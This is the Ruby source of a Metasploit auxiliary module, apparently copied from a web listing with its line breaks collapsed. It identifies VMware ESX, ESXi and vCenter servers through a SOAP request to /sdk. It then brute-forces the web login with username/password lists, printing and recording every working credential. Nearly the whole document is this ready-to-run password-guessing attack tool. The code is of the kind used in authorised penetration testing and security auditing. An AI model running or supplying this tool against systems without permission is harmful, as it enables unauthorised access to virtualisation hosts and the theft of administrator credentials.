Headline
VMWare Web Login Scanner
This Metasploit module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXI.
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Scanner def initialize super( 'Name' => 'VMWare Web Login Scanner', 'Description' => 'This module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXI', 'Author' => ['theLightCosine'], 'References' => [ [ 'CVE', '1999-0502'] # Weak password ], 'License' => MSF_LICENSE, 'DefaultOptions' => { 'SSL' => true } ) register_options( [ OptString.new('URI', [true, "The default URI to login with", "/sdk"]), Opt::RPORT(443) ]) end def report_cred(opts) service_data = { address: opts[:ip], port: opts[:port], service_name: 'vmware', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data) login_data = { last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end def run_host(ip) return unless is_vmware? each_user_pass { |user, pass| result = vim_do_login(user, pass) case result when :success print_good "#{rhost}:#{rport} - Successful Login! (#{user}:#{pass})" report_cred(ip: rhost, port: rport, user: user, password: pass, proof: result) return if datastore['STOP_ON_SUCCESS'] when :fail print_error "#{rhost}:#{rport} - Login Failure (#{user}:#{pass})" end } end # Mostly taken from the Apache Tomcat service validator def is_vmware? soap_data = %Q|<env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:env="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <env:Body> <RetrieveServiceContent xmlns="urn:vim25"> <_this type="ServiceInstance">ServiceInstance</_this> </RetrieveServiceContent> </env:Body> </env:Envelope>| res = send_request_cgi({ 'uri' => normalize_uri(datastore['URI']), 'method' => 'POST', 'agent' => 'VMware VI Client', 'data' => soap_data }, 25) unless res vprint_error("#{rhost}:#{rport} Error: no response") return false end fingerprint_vmware(res) rescue ::Rex::ConnectionError => e vprint_error("#{rhost}:#{rport} Error: could not connect") return false rescue => e vprint_error("#{rhost}:#{rport} Error: #{e}") return false end def fingerprint_vmware(res) unless res vprint_error("#{rhost}:#{rport} Error: no response") return false end return false unless res.body.include?('<vendor>VMware, Inc.</vendor>') os_match = res.body.match(/<name>([\w\s]+)<\/name>/) ver_match = res.body.match(/<version>([\w\s\.]+)<\/version>/) build_match = res.body.match(/<build>([\w\s\.\-]+)<\/build>/) full_match = res.body.match(/<fullName>([\w\s\.\-]+)<\/fullName>/) if full_match print_good "#{rhost}:#{rport} - Identified #{full_match[1]}" report_service(:host => rhost, :port => rport, :proto => 'tcp', :sname => 'https', :info => full_match[1]) end unless os_match and ver_match and build_match vprint_error("#{rhost}:#{rport} Error: Could not identify host as VMWare") return false end if os_match[1].include?('ESX') || os_match[1].include?('vCenter') # Report a fingerprint match for OS identification report_note( :host => rhost, :ntype => 'fingerprint.match', :data => {'os.vendor' => 'VMware', 'os.product' => os_match[1] + " " + ver_match[1], 'os.version' => build_match[1] } ) return true end endend